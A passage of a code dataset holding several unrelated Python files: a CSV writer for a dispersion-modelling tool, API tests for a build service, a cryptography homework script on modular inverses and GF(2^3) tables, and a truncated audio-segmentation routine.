ridt.base import RIDTOSError\n\nfrom ridt.config import RIDTConfig\nfrom ridt.config import Units\n\nfrom .directoryagent import DirectoryAgent\n\nfrom ridt.container import Domain\n\nfrom .datastore import DataStore\n\nfrom ridt import bar_args\n\n\nclass DataStoreCSVWriter:\n \"\"\"Class that writes a :class:`~.DataStore` instance to CSV files.\n\n Attributes\n ----------\n settings : :class:`~.RIDTConfig`\n The settings for the run in question.\n\n dir_agent : :class:`~.DirectoryAgent`\n The path to the output directory for the run.\n \n domain : :class:`~.Domain`\n The instance of :class:`~.Domain` corresponding to :attr:`setting`.\n\n units : :class:`~.Units`\n The 
instance of :class:`~.Units` corresponding to :attr:`setting`.\n\n data_store : :class:`~.DataStore`\n The data store to be analysed.\n\n quantity: :obj:`str`\n The string id for the quantity stored in the data store.\n\n \"\"\" \n\n def __init__(self,\n setting: RIDTConfig,\n data_store: DataStore,\n dir_agent: DirectoryAgent,\n quantity: str):\n \"\"\"The :class:`DataStoreCSVWriter` constructor.\n\n Parameters\n ----------\n settings : :class:`~.RIDTConfig`\n The settings for the run in question.\n\n dir_agent : :class:`~.DirectoryAgent`\n The path to the output directory for the run.\n \n data_store : :class:`~.DataStore`\n The data store to be analysed.\n\n quantity: :obj:`str`\n The string id for the quantity stored in the data store.\n\n \"\"\"\n self.dir_agent = dir_agent\n self.setting = setting\n self.units = Units(setting)\n self.domain = Domain(setting)\n self.quantity = quantity\n self.write(data_store)\n \n @property\n def geometries(self):\n \"\"\":obj:`list` [:obj:`str`] : the list of geometries selected for\n evaluation in :attr:`settings`.\n\n \"\"\"\n locations = self.setting.models.eddy_diffusion.monitor_locations\n return [g for g, e in locations.evaluate.items() if e]\n\n def write(self, data_store: DataStore) -> None:\n \"\"\"Loops over entries in the data store and writes the data to csv file.\n\n Parameters\n ----------\n data_store : :class:`~.DataStore`\n The data store to be analysed.\n \n Returns\n -------\n None\n\n \"\"\"\n for geometry in self.geometries:\n self.dir_agent.create_data_dir(geometry, self.quantity)\n for id in getattr(data_store, geometry):\n self.write_csv(geometry, id, data_store.get(geometry, id))\n \n def write_csv(self, geometry: str, id: str, data: ndarray) -> None:\n \"\"\"Takes string identifiers and the grid and writes them to a csv file.\n\n Parameters\n ----------\n geometry : :obj:`str`\n The type of grid to be written.\n\n id : :obj:`str`\n The id of the grid to be written.\n\n data : 
:class:`~numpy.ndarray`\n The grid to be written.\n\n Raises\n ------\n :class:`~.RIDTOSError`\n If unable to create the file on disk.\n \n Returns\n -------\n None\n\n \"\"\"\n path = join(self.dir_agent.ddir, id + \".csv\")\n factor = getattr(self.units, f\"{self.quantity}_factor\")\n\n try:\n f = open(path, 'w', newline=\"\")\n except OSError as e:\n raise RIDTOSError(e)\n\n writer = csv.writer(f, delimiter=\",\")\n writer.writerow([\n f\"time ({self.units.time})\",\n f\"x ({self.units.space})\",\n f\"y ({self.units.space})\",\n f\"z ({self.units.space})\",\n f\"value ({getattr(self.units, f'{self.quantity}')})\"\n ])\n\n indices = list(product(*[range(i) for i in data.shape]))\n\n print(f\"Writing {id} {self.quantity} data to a csv file...\")\n for index in tqdm(indices, total=len(indices), **bar_args):\n values = self.domain.values(id, index)\n writer.writerow(list(values) + [data[index] / factor])\n f.close()","repo_name":"riskaware-ltd/ridt","sub_path":"ridt/data/datastorecsvwriter.py","file_name":"datastorecsvwriter.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2166588825","text":"from cStringIO import StringIO\n\nfrom changes.config import db\nfrom changes.models import Job, JobPlan, ProjectOption\nfrom changes.testutils import APITestCase, SAMPLE_DIFF\n\n\nclass BuildListTest(APITestCase):\n path = '/api/0/builds/'\n\n def test_simple(self):\n build = self.create_build(self.project)\n build2 = self.create_build(self.project2)\n\n resp = self.client.get(self.path)\n assert resp.status_code == 200\n data = self.unserialize(resp)\n assert len(data) == 2\n assert data[0]['id'] == build2.id.hex\n assert data[1]['id'] == build.id.hex\n\n\nclass BuildCreateTest(APITestCase):\n path = '/api/0/builds/'\n\n def test_minimal(self):\n resp = self.client.post(self.path, data={\n 'sha': 'a' * 40,\n 'project': self.project.slug,\n })\n assert resp.status_code == 
200\n data = self.unserialize(resp)\n assert len(data) == 1\n assert data[0]['id']\n\n job = Job.query.filter(\n Job.build_id == data[0]['id']\n ).first()\n build = job.build\n source = build.source\n\n assert job.project == self.project\n\n assert source.repository_id == self.project.repository_id\n assert source.revision_sha == 'a' * 40\n\n def test_defaults_to_revision(self):\n revision = self.create_revision(sha='a' * 40)\n resp = self.client.post(self.path, data={\n 'sha': 'a' * 40,\n 'project': self.project.slug,\n })\n assert resp.status_code == 200\n data = self.unserialize(resp)\n assert len(data) == 1\n assert data[0]['id']\n\n job = Job.query.filter(\n Job.build_id == data[0]['id']\n ).first()\n build = job.build\n source = build.source\n\n assert build.message == revision.message\n assert build.author == revision.author\n assert build.label == revision.subject\n\n assert job.project == self.project\n\n assert source.repository_id == self.project.repository_id\n assert source.revision_sha == 'a' * 40\n\n def test_with_full_params(self):\n resp = self.client.post(self.path, data={\n 'project': self.project.slug,\n 'sha': 'a' * 40,\n 'target': 'D1234',\n 'label': 'Foo Bar',\n 'message': 'Hello world!',\n 'author': 'David Cramer ',\n 'patch': (StringIO(SAMPLE_DIFF), 'foo.diff'),\n 'patch[data]': '{\"foo\": \"bar\"}',\n })\n assert resp.status_code == 200, resp.data\n\n data = self.unserialize(resp)\n assert len(data) == 1\n assert data[0]['id']\n\n job = Job.query.filter(\n Job.build_id == data[0]['id']\n ).first()\n build = job.build\n source = build.source\n\n assert build.author.name == 'David Cramer'\n assert build.author.email == 'dcramer@example.com'\n assert build.message == 'Hello world!'\n assert build.label == 'Foo Bar'\n assert build.target == 'D1234'\n\n assert job.project == self.project\n assert job.label == self.plan.label\n\n assert source.repository_id == self.project.repository_id\n assert source.revision_sha == 'a' * 40\n assert 
source.data == {'foo': 'bar'}\n\n patch = source.patch\n assert patch.diff == SAMPLE_DIFF\n assert patch.parent_revision_sha == 'a' * 40\n\n jobplans = list(JobPlan.query.filter(\n JobPlan.build_id == build.id,\n ))\n\n assert len(jobplans) == 1\n\n assert jobplans[0].plan_id == self.plan.id\n assert jobplans[0].project_id == self.project.id\n\n def test_with_repository(self):\n plan = self.create_plan()\n repo = self.create_repo()\n\n project1 = self.create_project(repository=repo)\n project2 = self.create_project(repository=repo)\n plan.projects.append(project1)\n plan.projects.append(project2)\n db.session.commit()\n\n resp = self.client.post(self.path, data={\n 'repository': repo.url,\n 'sha': 'a' * 40,\n })\n assert resp.status_code == 200\n data = self.unserialize(resp)\n assert len(data) == 2\n\n def test_with_patch_without_diffs_enabled(self):\n po = ProjectOption(\n project=self.project,\n name='build.allow-patches',\n value='0',\n )\n db.session.add(po)\n db.session.commit()\n\n resp = self.client.post(self.path, data={\n 'sha': 'a' * 40,\n 'project': self.project.slug,\n 'patch': (StringIO(SAMPLE_DIFF), 'foo.diff'),\n 'patch[label]': 'D1234',\n })\n assert resp.status_code == 200, resp.data\n data = self.unserialize(resp)\n assert len(data) == 0\n","repo_name":"dlitz/changes","sub_path":"tests/changes/api/test_build_index.py","file_name":"test_build_index.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"10950046938","text":"########################################################################################################################\n# Problem 1\n########################################################################################################################\n# The task is to find the invertible elements of Z_20.\n# ==> Iterate thru x, y in 0..19 and check whether xy == 1\n\nprint(f\"PROBLEM 1:\")\nprint(f\"Finding multiplicative 
inverses...\\n\")\ninvertibles = set()\nfor y in range(20):\n for x in range(0, y + 1):\n result = (x * y) % 20\n if result == 1:\n print(f\"{x} * {y} = {x * y} = {result}\")\n invertibles.add(x)\n invertibles.add(y)\n\nprint(f\"\\nThe invertible elements are {invertibles}.\\n\\n\")\n\n########################################################################################################################\n########################################################################################################################\n\n\n########################################################################################################################\n# Problem 3\n########################################################################################################################\n# The task is to find all primitive roots modulo 17.\n# This is equivalent to finding all generators of the multiplicative group of integers modulo 17.\n# ==> Thus find all generators...\n\nprint(f\"PROBLEM 3:\")\nprint(f\"Computing generators...\\n\")\ngenerators = set()\ngroup = set(range(1, 17))\nfor x in group:\n generated = set()\n newElem = x\n while True:\n if newElem in generated:\n break\n generated.add(newElem)\n newElem = newElem * x % 17\n if generated == group:\n generators.add(x)\n\nprint(f\"The generators are {generators}.\\n\\n\")\n\n########################################################################################################################\n########################################################################################################################\n\n\n########################################################################################################################\n# Problem 4\n########################################################################################################################\n# The task is to construct a addition/multiplication tables for GF(2^3) using the polynomial x^3 + x^2 + 1.\n\nprint(f\"PROBLEM 4 part 
a:\")\nprint(f\"Computing the operation tables for GF(2^3) using the polynomial x^3 + x^2 + 1.\\n\")\n\n# Represent polynomials as lists\nfield = [[x, y, z] for x in range(2) for y in range(2) for z in range(2)]\n\n# Create a function to add polynomials\ndef add(x, y):\n length = max(len(x), len(y))\n z = list(map(lambda a: 0, range(length)))\n for i in range(length):\n a = 0\n if i < len(x):\n a += x[i]\n if i < len(y):\n a += y[i]\n z[i] = a % 2\n return z\n\n# Create function to multiply polynomials\ndef multiply(x, y):\n length = max(len(x), len(y))\n z = list(map(lambda a: 0, range(length)))\n for i in range(len(y)):\n if y[i] == 1:\n z = add(z, list(map(lambda a: 0, range(i))) + x)\n return z\n\n# Create a function that reduces polynomials wrt magic law 1 given by x^3 + x^2 + 1.\ndef magic_law1(x):\n z = x.copy()\n for i in range(len(x) - 1, 2, -1):\n if z[i] == 1:\n modifier = list(map(lambda a: 0, range(i - 3))) + [1, 0, 1, 1]\n z = add(z, modifier)\n return z\n\ndef add_field1(x, y):\n return magic_law1(add(x, y))\n\ndef multiply_field1(x, y):\n return magic_law1(multiply(x, y))\n\n# Create function to return nicer representation\ndef prettyPrint(x):\n return f\"{x[2]}{x[1]}{x[0]}\"\n\n# Create function to print a table\ndef createTable(elems, op):\n elems = list(elems)\n # Create header row\n print(f\"{'':4}| \", end='')\n for e in elems:\n print(f\"{prettyPrint(e):4}\", end='')\n print(\"\")\n # Print horizontal line\n print(\"----|-\", end='')\n for i in range(len(elems)):\n print(\"----\", end='')\n print(\"\")\n for x in elems:\n print(f\"{prettyPrint(x):4}| \", end='')\n for y in elems:\n print(f\"{prettyPrint(op(x, y)):4}\", end='')\n print(\"\")\n\nprint(f\"Addition table:\")\ncreateTable(field, add_field1)\nprint(f\"\\n\\nMultiplication table:\")\ncreateTable(field, multiply_field1)\nprint(\"\\n\")\n\n\nprint(f\"PROBLEM 4 part b:\")\n# Make sure the polynomial x^3 + x^2 + 1 is irreducible.\n\ndef degree(x):\n for i in range(len(x) - 1, -1, -1):\n 
if x[i] == 1:\n break\n return i\n\ndef trim(x):\n return x[:(degree(x) + 1)]\n\nfactor_candidates = [(x, y) for x in field for y in field if degree(x) + degree(y) == 3]\nfound_factors = False\nfor x, y in factor_candidates:\n if trim(multiply(x, y)) == [1, 0, 1, 1]:\n found_factors = True\n break\nif found_factors:\n print(f\"The polynomial is not irreducible!!!!\")\nelse:\n print(f\"The polynomial is irreducible!!!!\")\n\nprint(\"\\n\")\n########################################################################################################################\n########################################################################################################################\n\n########################################################################################################################\n# Problem 5\n########################################################################################################################\n# The task is to construct a addition/multiplication tables for GF(2^3) using the polynomial x^3 + x + 1.\n\nprint(f\"PROBLEM 5 part a:\")\nprint(f\"Computing the operation tables for GF(2^3) using the polynomial x^3 + x + 1.\\n\")\n\n# Create a function that reduces polynomials wrt magic law 2 given by x^3 + x + 1.\ndef magic_law2(x):\n z = x.copy()\n for i in range(len(x) - 1, 2, -1):\n if z[i] == 1:\n modifier = list(map(lambda a: 0, range(i - 3))) + [1, 1, 0, 1]\n z = add(z, modifier)\n return z\n\ndef add_field2(x, y):\n return magic_law2(add(x, y))\n\ndef multiply_field2(x, y):\n return magic_law2(multiply(x, y))\n\nprint(f\"Addition table:\")\ncreateTable(field, add_field2)\nprint(f\"\\n\\nMultiplication table:\")\ncreateTable(field, multiply_field2)\nprint(\"\\n\")\n\n\nprint(f\"PROBLEM 5 part b:\")\n\n\n# Define isomorphism candidates\ndef h1(x):\n a = x[2]\n b = x[1]\n c = x[0]\n y = [0, 0, 0]\n y[0] = (a + b + c) % 2\n y[1] = (a) % 2\n y[2] = (a + b) % 2\n return y\n\n\ndef h2(x):\n a = x[2]\n b = x[1]\n c = x[0]\n y = [0, 0, 
0]\n y[0] = (c) % 2\n y[1] = (a + b) % 2\n y[2] = (b) % 2\n return y\n\n\ndef h3(x):\n a = x[2]\n b = x[1]\n c = x[0]\n y = [0, 0, 0]\n y[0] = (a + b + c) % 2\n y[1] = (a + b) % 2\n y[2] = (b) % 2\n return y\n\n\n# Create function to test a candidate for isomorphism\ndef test_candidate(candidate):\n still_valid = True\n for x in field:\n if not still_valid:\n break\n for y in field:\n if not still_valid:\n break\n lhs = trim(candidate(multiply_field1(x, y)))\n rhs = trim(multiply_field2(candidate(x), candidate(y)))\n if lhs != rhs:\n print(f\"Found a counterexample:\\n\"\n f\"h({prettyPrint(x)} *_f {prettyPrint(y)}) = {prettyPrint(lhs)}\\n\"\n f\"h({prettyPrint(x)}) *_g h({prettyPrint(y)}) = {prettyPrint(rhs)}\\n\"\n f\"{prettyPrint(lhs)} != {prettyPrint(rhs)}\\n\")\n still_valid = False\n lhs = trim(candidate(add_field1(x, y)))\n rhs = trim(add_field2(candidate(x), candidate(y)))\n if lhs != rhs:\n print(f\"Found a counterexample:\\n\"\n f\"h({prettyPrint(x)} +_f {prettyPrint(y)}) = {prettyPrint(lhs)}\\n\"\n f\"h({prettyPrint(x)}) +_g h({prettyPrint(y)}) = {prettyPrint(rhs)}\\n\"\n f\"{prettyPrint(lhs)} != {prettyPrint(rhs)}\\n\")\n still_valid = False\n if still_valid:\n print(f\"Isomorphism laws hold!!!\")\n\n\nprint(f\"Testing isomorphism candidates:\\n\")\nprint(f\"Testing candidate 1\")\ntest_candidate(h1)\nprint(f\"\\nTesting candidate 2\")\ntest_candidate(h2)\nprint(f\"\\nTesting candidate 3\")\ntest_candidate(h3)\n\n\n\n########################################################################################################################\n########################################################################################################################\n\n","repo_name":"J-Savela/Crypto","sub_path":"src/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":8536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72441158213","text":"import random\nimport sys\nimport 
os\nsys.path.insert(0,'./..')\nimport numpy as np\nimport wave\nimport scipy.io.wavfile as wavfile\nimport math\nimport soundfile as sf\nfrom python_speech_features import mfcc\nfrom numpy.linalg import inv\nfrom scipy.stats import norm\n\n\nfrom peakdetect import peakdet\nfrom readcsv import getcsvfeat\n\n\n\n#feat_file : CSV file with THE FEATURES; SHAPE=(nDimensions X Samples)\n#wav_file: filename of the audio WAV FILE\n\n#usually : amplitude=1, dist_1=4.2\n#numfrwin=window size=100(1s);(each frame=10ms)\n#returns TimeStamp,FrameStamp, and the Features(which is inputted by the User; passed to CLustering Function\n\n\ndef segment(wav_file,feat_file,amplitude,dist_1,numfrwin,nsh):\n\n x, fs = sf.read(wav_file)\n\n if(feat_file=='NoneProvided'):\n feat = mfcc(x,fs,0.025,0.010,13)\n feat= feat.transpose()\n nsh=0.010\n print('using Inbuilt MFFCs as features')\n else:\n feat=getcsvfeat(feat_file)\n if(nsh==1):\n print('ERROR, please enter -res (Window Shift) as Features are provided')\n sys.exit()\n print('using provided Features')\n\n \n\n print(nsh)\n win_ind_1=0\n win_ind_2=win_ind_1+numfrwin\n\n \n dim=len(feat[:,1])#to find the dimensions of the FEATURE\n \n dist=0\n count=0\n w1=np.zeros((dim,numfrwin))\n w2=np.zeros((dim,numfrwin))\n w3=np.zeros((dim,2*numfrwin))\n d=[]\n frame_no=[]\n num_frame=len(feat[1,:])\n Nw=math.floor(fs*0.025)\n Nsh=math.floor(fs*nsh)#0.010 by default\n\n frame_index_w1=0\n frame_index_w2=0+numfrwin*Nsh\n\n \n\n \n while(win_ind_2+numfrwin